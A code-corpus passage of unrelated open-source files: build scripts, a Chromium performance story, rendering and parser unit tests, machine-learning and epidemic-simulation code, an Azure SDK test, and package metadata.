'cl /nologo /Ox /Zi /W4 /WX /D_UNICODE /DUNICODE'
' /D_CRT_SECURE_NO_WARNINGS /EHsc %s /link /out:%s'
% (os.path.join('..', infile), outfile), BUILD_DIR)
if rc:
print out
print 'Failed to build %s' % outfile
sys.exit(1)
else:
print '%s already built' % outfile
return outpath
def main():
# Switch to our own dir.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
if sys.argv[-1] == 'clean':
if os.path.exists(BUILD_DIR):
shutil.rmtree(BUILD_DIR)
for exe in glob.glob('*.exe'):
os.unlink(exe)
return 0
vcdir = os.environ.get('VCINSTALLDIR')
if not vcdir:
vcdir = get_vc_dir()
if not vcdir:
print 'Could not get VCINSTALLDIR. Run vsvars32.bat?'
return 1
os.environ['PATH'] += (';' + os.path.join(vcdir, 'bin') +
';' + os.path.join(vcdir, r'..\Common7\IDE'))
# Verify that we can find link.exe.
link = os.path.join(vcdir, 'bin', 'link.exe')
if not os.path.exists(link):
print 'link.exe not found at %s' % link
return 1
exe_name = build('limiter.cc')
for shim_exe in ('lib.exe', 'link.exe'):
newpath = '%s__LIMITER.exe' % shim_exe
shutil.copyfile(exe_name, newpath)
print '%s shim built. Use with msbuild like: "/p:LinkToolExe=%s"' \
% (shim_exe, os.path.abspath(newpath))
return 0
if __name__ == '__main__':
sys.exit(main())
|
python-bitwise-operators/stegano/eraser.py | syberflea/materials | 3,682 | 12684665 | """
Secret file eraser.
"""
from itertools import islice
from random import random
from .bitmap import Bitmap
def erase(bitmap: Bitmap) -> None:
"""Scramble a previously hidden data."""
if bitmap.reserved_field > 0:
for byte_offset in islice(bitmap.byte_offsets, bitmap.reserved_field):
bitmap[byte_offset] = randomize_lsb(bitmap[byte_offset])
bitmap.reserved_field = 0
print("Erased a secret file from the bitmap")
else:
print("Secret file not found in the bitmap")
def randomize_lsb(value: int) -> int:
"""Set a random bit on the least-significant position."""
return value & ~1 if random() < 0.5 else value | 1
|
tools/perf/page_sets/desktop_ui/webui_tab_strip_story.py | chromium/chromium | 14,668 | 12684668 | <gh_stars>1000+
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from page_sets.desktop_ui.browser_element_identifiers import \
kTabCounterButtonElementId
from page_sets.desktop_ui.custom_metric_utils import SetMetricNames
from page_sets.desktop_ui.js_utils import MEASURE_JS_MEMORY
from page_sets.desktop_ui.multitab_story import MultiTabStory
from page_sets.desktop_ui.ui_devtools_utils import ClickOn
from page_sets.desktop_ui.url_list import TOP_URL
from page_sets.desktop_ui.webui_utils import Inspect
from page_sets.desktop_ui import story_tags
WEBUI_TAB_STRIP_BENCHMARK_UMA = [
'TabStrip.Tab.Views.ActivationAction',
'TabStrip.Tab.WebUI.ActivationAction',
'WebUITabStrip.CloseAction',
'WebUITabStrip.CloseTabAction',
'WebUITabStrip.LoadCompletedTime',
'WebUITabStrip.LoadDocumentTime',
'WebUITabStrip.OpenAction',
'WebUITabStrip.OpenDuration',
'WebUITabStrip.TabActivation',
'WebUITabStrip.TabCreation',
'WebUITabStrip.TabDataReceived',
]
WEBUI_TAB_STRIP_CUSTOM_METRIC_NAMES = [
'Jank',
'Tab.Preview.CompressJPEG',
'Tab.Preview.CompressJPEGWithFlow',
'Tab.Preview.VideoCapture',
'Tab.Preview.VideoCaptureFrameReceived',
'TabStripPageHandler:HandleGetGroupVisualData',
'TabStripPageHandler:HandleGetLayout',
'TabStripPageHandler:HandleGetTabs',
'TabStripPageHandler:HandleGetThemeColors',
'TabStripPageHandler:HandleSetThumbnailTracked',
'TabStripPageHandler:HandleThumbnailUpdate',
'TabStripPageHandler:NotifyLayoutChanged',
'TabStripPageHandler:OnTabGroupChanged',
'TabStripPageHandler:OnTabStripModelChanged',
'TabStripPageHandler:TabChangedAt',
'TabStripPageHandler:TabGroupedStateChanged',
]
WEBUI_TAB_STRIP_URL = 'chrome://tab-strip.top-chrome/'
class WebUITabStripStory(MultiTabStory):
"""Base class for webui tab strip stories"""
def RunPageInteractions(self, action_runner):
SetMetricNames(action_runner, WEBUI_TAB_STRIP_CUSTOM_METRIC_NAMES)
ClickOn(self._devtools, element_id=kTabCounterButtonElementId)
action_runner = Inspect(action_runner.tab.browser, WEBUI_TAB_STRIP_URL)
action_runner.ExecuteJavaScript(MEASURE_JS_MEMORY %
'webui_tab_strip:used_js_heap_size_begin')
self.InteractWithPage(action_runner)
action_runner.ExecuteJavaScript(MEASURE_JS_MEMORY %
'webui_tab_strip:used_js_heap_size_end')
def InteractWithPage(self, action_runner):
self.ScrollTabs(action_runner)
action_runner.Wait(5)
def ScrollTabs(self, action_runner):
action_runner.Wait(1)
self.StartMeasuringFrameTime(action_runner,
'webui_tab_strip:frame_time_on_scroll')
action_runner.ScrollElement(element_function=SCROLL_ELEMENT_FUNCTION,
direction='left')
self.StopMeasuringFrameTime(action_runner)
action_runner.Wait(1)
def WillStartTracing(self, chrome_trace_config):
super(WebUITabStripStory, self).WillStartTracing(chrome_trace_config)
chrome_trace_config.category_filter.AddIncludedCategory('benchmark')
chrome_trace_config.category_filter.AddIncludedCategory('ui')
chrome_trace_config.EnableUMAHistograms(*WEBUI_TAB_STRIP_BENCHMARK_UMA)
class WebUITabStripStoryCleanSlate(WebUITabStripStory):
NAME = 'webui_tab_strip:clean_slate'
URL_LIST = []
URL = 'about:blank'
TAGS = [story_tags.SMOKE_TEST]
WAIT_FOR_NETWORK_QUIESCENCE = False
class WebUITabStripStoryTop10(WebUITabStripStory):
NAME = 'webui_tab_strip:top10:2020'
URL_LIST = TOP_URL[:10]
URL = URL_LIST[0]
WAIT_FOR_NETWORK_QUIESCENCE = True
class WebUITabStripStoryTop10Loading(WebUITabStripStory):
NAME = 'webui_tab_strip:top10:loading:2020'
URL_LIST = TOP_URL[:10]
URL = URL_LIST[0]
WAIT_FOR_NETWORK_QUIESCENCE = False
class WebUITabStripStoryMeasureMemory(WebUITabStripStory):
NAME = 'webui_tab_strip:measure_memory'
URL_LIST = []
URL = 'about:blank'
WAIT_FOR_NETWORK_QUIESCENCE = False
def WillStartTracing(self, chrome_trace_config):
super(WebUITabStripStoryMeasureMemory,
self).WillStartTracing(chrome_trace_config)
chrome_trace_config.category_filter.AddExcludedCategory('*')
chrome_trace_config.category_filter.AddIncludedCategory('blink.console')
chrome_trace_config.category_filter.AddDisabledByDefault(
'disabled-by-default-memory-infra')
def GetExtraTracingMetrics(self):
return super(WebUITabStripStoryMeasureMemory,
self).GetExtraTracingMetrics() + ['memoryMetric']
def InteractWithPage(self, action_runner):
action_runner.MeasureMemory(deterministic_mode=True)
class WebUITabStripStoryMeasureMemory2Window(WebUITabStripStoryMeasureMemory):
NAME = 'webui_tab_strip:measure_memory:2window'
URL_LIST = []
URL = 'about:blank'
WAIT_FOR_NETWORK_QUIESCENCE = False
def InteractWithPage(self, action_runner):
action_runner.tab.browser.tabs.New(url='about:blank', in_new_window=True)
action_runner.Wait(1)
action_runner.MeasureMemory(deterministic_mode=True)
SCROLL_ELEMENT_FUNCTION = '''
document.querySelector('tabstrip-tab-list')
'''
|
tests/draw/svg/test_visibility.py | rianmcguire/WeasyPrint | 4,512 | 12684672 | <reponame>rianmcguire/WeasyPrint<gh_stars>1000+
"""
weasyprint.tests.test_draw.svg.test_visibility
----------------------------------------------
Test how the visibility is controlled with "visibility" and "display"
attributes.
"""
from ...testing_utils import assert_no_logs
from .. import assert_pixels
@assert_no_logs
def test_visibility_visible():
assert_pixels('visibility_visible', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect visibility="visible"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_visibility_hidden():
assert_pixels('visibility_hidden', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect visibility="hidden"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_visibility_inherit_hidden():
assert_pixels('visibility_inherit_hidden', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g visibility="hidden">
<rect x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_visibility_inherit_visible():
assert_pixels('visibility_inherit_visible', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g visibility="hidden">
<rect visibility="visible"
x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_display_inline():
assert_pixels('display_inline', 9, 9, '''
_________
_________
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
__RRRRR__
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect display="inline"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_display_none():
assert_pixels('display_none', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<rect display="none"
x="2" y="2" width="5" height="5" fill="red" />
</svg>
''')
@assert_no_logs
def test_display_inherit_none():
assert_pixels('display_inherit_none', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g display="none">
<rect x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
@assert_no_logs
def test_display_inherit_inline():
assert_pixels('display_inherit_inline', 9, 9, '''
_________
_________
_________
_________
_________
_________
_________
_________
_________
''', '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">
<g display="none">
<rect display="inline"
x="2" y="2" width="5" height="5" fill="red" />
</g>
</svg>
''')
|
conversion/convert_depth_maps.py | thduynguyen/sixd_toolkit | 127 | 12684724 | # Author: <NAME> (<EMAIL>)
# Center for Machine Perception, Czech Technical University in Prague
import os
import sys
import glob
import numpy as np
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pysixd import inout
from params.dataset_params import get_dataset_params
par = get_dataset_params('hinterstoisser')
# data_ids = range(1, par.obj_count + 1)
data_ids = range(1, par['scene_count'] + 1)
# depth_mpath = par.train_depth_mpath
depth_mpath = par['test_depth_mpath']
scale = 0.1
for data_id in data_ids:
print('Processing id: ' + str(data_id))
depth_paths = sorted(glob.glob(os.path.join(
os.path.dirname(depth_mpath.format(data_id, 0)), '*')))
for depth_path in depth_paths:
d = inout.load_depth(depth_path)
d *= scale
d = np.round(d).astype(np.uint16)
inout.save_depth(depth_path, d)
|
robustness_metrics/datasets/__init__.py | goncaloperes/robustness_metrics | 383 | 12684731 | # coding=utf-8
# Copyright 2021 The Robustness Metrics Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Module-level convenience functions."""
from robustness_metrics.datasets import base
from robustness_metrics.datasets import ood_detection
from robustness_metrics.datasets import tfds
def get(dataset_spec) -> base.Dataset:
"""Fetches a dataset from the dataset registry."""
return base.registry.get_instance(dataset_spec)
def get_available_datasets():
"""Fetches dataset constructor from the dataset registry."""
return base.registry.get_registered_subclasses()
|
Tests/test_Compass.py | lukasz-kozlowski/biopython | 2,856 | 12684735 | # Copyright 2009 by <NAME>. All rights reserved.
# Revisions copyright 2009-2010 by <NAME>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for parsing Compass output."""
import os
import unittest
from Bio import Compass
class CompassTest(unittest.TestCase):
def setUp(self):
file_dir = os.path.join("Compass")
self.test_files = [
os.path.join(file_dir, "comtest1"),
os.path.join(file_dir, "comtest2"),
]
def testCompassScanAndConsume(self):
with open(self.test_files[0]) as handle:
com_record = Compass.read(handle)
self.assertEqual("60456.blo.gz.aln", com_record.query)
self.assertEqual("60456.blo.gz.aln", com_record.hit)
self.assertEqual(0.5, com_record.gap_threshold)
self.assertEqual(388, com_record.query_length)
self.assertEqual(386, com_record.query_filtered_length)
self.assertEqual(388, com_record.hit_length)
self.assertEqual(386, com_record.hit_filtered_length)
self.assertEqual(399, com_record.query_nseqs)
self.assertEqual(12.972, com_record.query_neffseqs)
self.assertEqual(399, com_record.hit_nseqs)
self.assertEqual(12.972, com_record.hit_neffseqs)
self.assertEqual(2759, com_record.sw_score)
self.assertEqual(float("0.00e+00"), com_record.evalue)
def testCompassParser(self):
with open(self.test_files[0]) as handle:
com_record = Compass.read(handle)
self.assertEqual("60456.blo.gz.aln", com_record.query)
def testCompassIteratorEasy(self):
with open(self.test_files[0]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual("60456.blo.gz.aln", com_record.query)
self.assertRaises(StopIteration, next, records)
def testCompassIteratorHard(self):
with open(self.test_files[1]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual("allscop//14982.blo.gz.aln", com_record.hit)
self.assertEqual(float("1.01e+03"), com_record.evalue)
com_record = next(records)
self.assertEqual("allscop//14983.blo.gz.aln", com_record.hit)
self.assertEqual(float("1.01e+03"), com_record.evalue)
com_record = next(records)
self.assertEqual("allscop//14984.blo.gz.aln", com_record.hit)
self.assertEqual(float("5.75e+02"), com_record.evalue)
def testAlignmentParsingOne(self):
with open(self.test_files[1]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual(178, com_record.query_start)
self.assertEqual("KKDLEEIAD", com_record.query_aln)
self.assertEqual(9, com_record.hit_start)
self.assertEqual("QAAVQAVTA", com_record.hit_aln)
self.assertEqual("++ ++++++", com_record.positives)
com_record = next(records)
com_record = next(records)
self.assertEqual(371, com_record.query_start)
self.assertEqual("LEEAMDRMER~~~V", com_record.query_aln)
self.assertEqual(76, com_record.hit_start)
self.assertEqual("LQNFIDQLDNpddL", com_record.hit_aln)
self.assertEqual("+ ++++ + + +", com_record.positives)
def testAlignmentParsingTwo(self):
with open(self.test_files[0]) as handle:
records = Compass.parse(handle)
com_record = next(records)
self.assertEqual(2, com_record.query_start)
self.assertEqual(2, com_record.hit_start)
self.assertEqual("LKERKL", com_record.hit_aln[-6:])
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
research/maskgan/models/bidirectional_vd.py | 873040/Abhishek | 153 | 12684757 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple bidirectional model definitions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from regularization import variational_dropout
FLAGS = tf.app.flags.FLAGS
def discriminator(hparams,
sequence,
is_training,
reuse=None,
initial_state=None):
"""Define the Discriminator graph."""
sequence = tf.cast(sequence, tf.int32)
if FLAGS.dis_share_embedding:
assert hparams.dis_rnn_size == hparams.gen_rnn_size, (
'If you wish to share Discriminator/Generator embeddings, they must be'
' same dimension.')
with tf.variable_scope('gen/decoder/rnn', reuse=True):
embedding = tf.get_variable('embedding',
[FLAGS.vocab_size, hparams.gen_rnn_size])
with tf.variable_scope('dis', reuse=reuse):
def lstm_cell():
return tf.contrib.rnn.BasicLSTMCell(
hparams.dis_rnn_size,
forget_bias=0.0,
state_is_tuple=True,
reuse=reuse)
attn_cell = lstm_cell
if is_training and hparams.dis_vd_keep_prob < 1:
def attn_cell():
return variational_dropout.VariationalDropoutWrapper(
lstm_cell(), FLAGS.batch_size, hparams.dis_rnn_size,
hparams.dis_vd_keep_prob, hparams.dis_vd_keep_prob)
cell_fwd = tf.contrib.rnn.MultiRNNCell(
[attn_cell() for _ in range(hparams.dis_num_layers)],
state_is_tuple=True)
cell_bwd = tf.contrib.rnn.MultiRNNCell(
[attn_cell() for _ in range(hparams.dis_num_layers)],
state_is_tuple=True)
# print initial_state
# print cell_fwd.zero_state(FLAGS.batch_size, tf.float32)
if initial_state:
state_fwd = [[tf.identity(x) for x in inner_initial_state]
for inner_initial_state in initial_state]
state_bwd = cell_bwd.zero_state(FLAGS.batch_size, tf.float32)
else:
state_fwd = cell_fwd.zero_state(FLAGS.batch_size, tf.float32)
state_bwd = cell_bwd.zero_state(FLAGS.batch_size, tf.float32)
def make_mask(keep_prob, units):
random_tensor = keep_prob
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
random_tensor += tf.random_uniform(tf.stack([FLAGS.batch_size, units]))
return tf.floor(random_tensor) / keep_prob
if is_training:
output_mask = make_mask(hparams.dis_vd_keep_prob,
2 * hparams.dis_rnn_size)
if not FLAGS.dis_share_embedding:
embedding = tf.get_variable('embedding',
[FLAGS.vocab_size, hparams.dis_rnn_size])
rnn_inputs = tf.nn.embedding_lookup(embedding, sequence)
rnn_inputs = tf.unstack(rnn_inputs, axis=1)
with tf.variable_scope('rnn') as vs:
outputs, _, _ = tf.contrib.rnn.static_bidirectional_rnn(
cell_fwd, cell_bwd, rnn_inputs, state_fwd, state_bwd, scope=vs)
if is_training:
outputs *= output_mask
# Prediction is linear output for Discriminator.
predictions = tf.contrib.layers.linear(outputs, 1, scope=vs)
predictions = tf.transpose(predictions, [1, 0, 2])
if FLAGS.baseline_method == 'critic':
with tf.variable_scope('critic', reuse=reuse) as critic_scope:
values = tf.contrib.layers.linear(outputs, 1, scope=critic_scope)
values = tf.transpose(values, [1, 0, 2])
return tf.squeeze(predictions, axis=2), tf.squeeze(values, axis=2)
else:
return tf.squeeze(predictions, axis=2), None
|
sdk/databox/azure-mgmt-databox/tests/test_cli_mgmt_databox.py | rsdoherty/azure-sdk-for-python | 2,728 | 12684759 | # coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# TEST SCENARIO COVERAGE
# ----------------------
# Methods Total : 16
# Methods Covered : 16
# Examples Total : 21
# Examples Tested : 21
# Coverage % : 100
# ----------------------
# current method cover: 15/16
import os
import unittest
import azure.mgmt.databox
from devtools_testutils import AzureMgmtTestCase, ResourceGroupPreparer
AZURE_LOCATION = 'eastus'
class MgmtDataBoxTest(AzureMgmtTestCase):
def setUp(self):
super(MgmtDataBoxTest, self).setUp()
self.mgmt_client = self.create_mgmt_client(
azure.mgmt.databox.DataBoxManagementClient
)
@unittest.skip("unavailable in track2")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_databox(self, resource_group):
SUBSCRIPTION_ID = None
if self.is_live:
SUBSCRIPTION_ID = os.environ.get("AZURE_SUBSCRIPTION_ID", None)
if not SUBSCRIPTION_ID:
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
STORAGE_ACCOUNT_NAME = 'databoxaccountabc'
JOB_NAME = 'testjob'
LOCATION_NAME = "westus"
# JobsCreate[put]
BODY = {
"details": {
"job_details_type": "DataBox",
"contact_details": {
"contact_name": "<NAME>",
"phone": "1234567890",
"phone_extension": "1234",
"email_list": [
"<EMAIL>"
]
},
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
"location": "westus",
"sku": {
"name": "DataBox"
}
}
result = self.mgmt_client.jobs.create(resource_group.name, JOB_NAME, BODY)
result = result.result()
# JobsGet5[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet4[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet3[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet2[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet1[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsGet[get]
result = self.mgmt_client.jobs.get(resource_group.name, JOB_NAME)
# JobsListByResourceGroup[get]
result = self.mgmt_client.jobs.list_by_resource_group(resource_group.name)
# JobsList[get]
result = self.mgmt_client.jobs.list()
# OperationsGet[get]
result = self.mgmt_client.operations.list()
# ServiceValidateInputsByResourceGroup[post]
BODY = {
"validation_category": "JobCreationValidation",
"individual_request_details": [
{
"validation_type": "ValidateDataDestinationDetails",
"location": "westus",
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
{
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
]
}
result = self.mgmt_client.service.validate_inputs_by_resource_group(resource_group.name, LOCATION_NAME, BODY)
# AvailableSkusByResourceGroup[post]
BODY = {
"country": "US",
"location": "westus",
"transfer_type": "ImportToAzure"
}
result = self.mgmt_client.service.list_available_skus_by_resource_group(resource_group.name, LOCATION_NAME, BODY)
"""
# BookShipmentPickupPost[post]
now = dt.datetime.now()
BODY = {
# For new test, change the start time as current date
# and end time as start_time + 2 days
"start_time": now,
"end_time": now + dt.timedelta(days=2),
"shipment_location": "Front desk"
}
self.mgmt_client.jobs.book_shipment_pick_up(resource_group.name, JOB_NAME, BODY)
"""
# JobsListCredentials[post]
result = self.mgmt_client.jobs.list_credentials(resource_group.name, JOB_NAME)
# JobsPatch[patch]
BODY = {
"details": {
"contact_details": {
"contact_name": "<NAME>",
"phone": "1234567890",
"phone_extension": "1234",
"email_list": [
"<EMAIL>"
]
},
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
}
}
}
result = self.mgmt_client.jobs.update(resource_group.name, JOB_NAME, BODY)
result = result.result()
# ServiceRegionConfiguration[post]
# TODO: SKUs are not available in live test
# BODY = {
# "storage_location": "westus",
# "sku_name": "DataBox"
# }
BODY = None
result = self.mgmt_client.service.region_configuration(LOCATION_NAME, BODY)
# ValidateAddressPost[post]
BODY = {
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
result = self.mgmt_client.service.validate_address_method(LOCATION_NAME, BODY)
# ServiceValidateInputs[post]
BODY = {
"validation_category": "JobCreationValidation",
"individual_request_details": [
{
"validation_type": "ValidateDataDestinationDetails",
"location": "westus",
"destination_account_details": [
{
"storage_account_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Storage/storageAccounts/" + STORAGE_ACCOUNT_NAME + "",
"data_destination_type": "StorageAccount"
}
]
},
{
"validation_type": "ValidateAddress",
"shipping_address": {
"street_address1": "16 TOWNSEND ST",
"street_address2": "Unit 1",
"city": "San Francisco",
"state_or_province": "CA",
"country": "US",
"postal_code": "94107",
"company_name": "Microsoft",
"address_type": "Commercial"
},
"device_type": "DataBox"
}
]
}
result = self.mgmt_client.service.validate_inputs(LOCATION_NAME, BODY)
# AvailableSkusPost[post]
BODY = {
"country": "US",
"location": "westus",
"transfer_type": "ImportToAzure"
}
result = self.mgmt_client.service.list_available_skus(LOCATION_NAME, BODY)
# JobsCancelPost[post]
BODY = {
"reason": "CancelTest"
}
result = self.mgmt_client.jobs.cancel(resource_group.name, JOB_NAME, BODY)
# JobsDelete[delete]
result = self.mgmt_client.jobs.delete(resource_group.name, JOB_NAME)
result = result.result()
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
|
apps/user/filter.py | parekhpriyanshu/website | 312 | 12684794 | <gh_stars>100-1000
#!/usr/bin/python
# -*- coding:utf-8 -*-
import django_filters
from django.db.models import Q
from apps.article.models import Article
from apps.user.models import User
class CategoryFilter(django_filters.rest_framework.FilterSet):
category = django_filters.rest_framework.CharFilter(field_name='category__id')
title = django_filters.rest_framework.CharFilter(field_name='title', lookup_expr='icontains')
# top_category = django_filters.rest_framework.NumberFilter(method='top_category_filter')
#
# def top_category_filter(self, queryset, name, value):
# print(queryset, name, value)
# queryset = queryset.filter(Q(category_id=value) | Q(category=value) )
# return queryset
class Meta:
model = Article
fields = ['category','title', ]
class UserFilter(django_filters.rest_framework.FilterSet):
category = django_filters.rest_framework.CharFilter(field_name='id', lookup_expr='icontains')
class Meta:
model = User
fields = ['category', ] |
vehicle/OVMS.V3/components/wolfssl/wrapper/python/wolfcrypt/wolfcrypt/__about__.py | qtwre/Open-Vehicle-Monitoring-System-3 | 322 | 12684817 | <gh_stars>100-1000
# __about__.py
#
# Copyright (C) 2006-2020 wolfSSL Inc.
#
# This file is part of wolfSSL.
#
# wolfSSL is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# wolfSSL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1335, USA
#/
metadata = dict(
__name__ = "wolfcrypt",
__version__ = "0.1.9",
__license__ = "GPLv2 or Commercial License",
__author__ = "wolfSSL Inc.",
__author_email__ = "<EMAIL>",
__url__ = "https://wolfssl.github.io/wolfcrypt-py",
__description__ = \
u"A Python library that encapsulates wolfSSL's wolfCrypt API.",
__keywords__ = "security, cryptography, ssl, embedded, embedded ssl",
__classifiers__ = [
u"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
u"License :: Other/Proprietary License",
u"Operating System :: OS Independent",
u"Programming Language :: Python :: 2.7",
u"Programming Language :: Python :: 3.5",
u"Topic :: Security",
u"Topic :: Security :: Cryptography",
u"Topic :: Software Development"
]
)
globals().update(metadata)
__all__ = list(metadata.keys())
|
docs/examples/fig5p4.py | uluturki/Mathematics-of-Epidemics-on-Networks | 136 | 12684828 | import EoN
import networkx as nx
import matplotlib.pyplot as plt
import scipy
import random
def get_deg_seq(N, Pk):
while True: #run until degree sequence has even sum of N entries
deg_seq = []
for counter in range(N):
r = random.random()
for k in Pk:
if Pk[k]>r:
break
else:
r-= Pk[k]
deg_seq.append(k)
if sum(deg_seq)%2 ==0:
break
return deg_seq
def sim_and_plot(G, tau, gamma, rho, tmax, tcount, ax):
t, S, I = EoN.fast_SIS(G, tau, gamma, rho = rho, tmax = tmax)
report_times = scipy.linspace(0, tmax, tcount)
I = EoN.subsample(report_times, t, I)
ax.plot(report_times, I/N, color='grey', linewidth=5, alpha=0.3)
t, S, I, = EoN.SIS_heterogeneous_meanfield_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N, '--')
t, S, I = EoN.SIS_compact_pairwise_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N)
t, S, I = EoN.SIS_homogeneous_pairwise_from_graph(G, tau, gamma, rho=rho,
tmax=tmax, tcount=tcount)
ax.plot(t, I/N, '-.')
N=10000
gamma = 1
rho = 0.05
tmax = 10
tcount = 1001
kmin = 1
kmax = 40
Pk = {}
for k in range(kmin, kmax+1):
Pk[k] = k**(-2.)
norm_factor = sum(Pk.values())
for k in Pk:
Pk[k] /= norm_factor
deg_seq = get_deg_seq(N, Pk)
G = nx.configuration_model(deg_seq)
kave = sum(deg_seq)/N
tau = 1.5*gamma/kave
fig = plt.figure(1)
main = plt.axes()
sim_and_plot(G, tau, gamma, rho, tmax, tcount, main)
kmin = 10
kmax = 150
Pk = {}
for k in range(kmin, kmax+1):
Pk[k] = k**(-2.)
norm_factor = sum(Pk.values())
